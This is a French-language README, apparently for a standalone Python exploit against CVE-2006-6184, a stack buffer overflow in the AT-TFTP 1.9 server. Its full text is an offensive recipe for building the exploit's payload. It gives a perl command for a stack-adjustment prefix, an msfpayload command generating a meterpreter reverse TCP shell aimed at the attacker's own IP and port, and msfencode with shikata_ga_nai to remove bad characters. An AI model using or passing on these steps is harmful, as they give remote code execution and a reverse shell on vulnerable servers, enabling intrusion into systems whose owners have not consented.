
version simplifiée de https://github.com/shauntdergrigorian/cve-2006-6184
Ceci est un exploit autonome basé sur Python pour CVE-2006-6184. Cet exploit déclenche un débordement de tampon basé sur la pile dans le serveur TFTP Allied Telesyn (AT-TFTP) 1.9, et possiblement les versions antérieures, permettant à des attaquants distants de provoquer un déni de service ou d'exécuter du code arbitraire.
Vous ne pensiez pas que ce serait si facile, n'est-ce pas ? La charge utile doit être personnalisée pour inclure votre propre adresse IP et votre port d'écoute, vous devrez donc la générer vous-même. Pour ce faire, suivez les étapes suivantes :
1.) Entrez ce qui suit pour créer un fichier hex représentant la quantité à soustraire du pointeur de pile (3500) :
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) Ensuite, utilisez la commande suivante pour créer une charge utile de shell meterpreter par étapes :
msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=[votre IP] LPORT=[votre port] R > payload
3.) Ensuite, combinez les deux fichiers que vous venez de créer.
cat stackadj payload > shellcode
4.) Enfin, éliminons les mauvais caractères.
cat shellcode | msfencode -b '\x00' -e x86/shikata_ga_nai -t python
Entrez la sortie comme valeur de la variable "payload".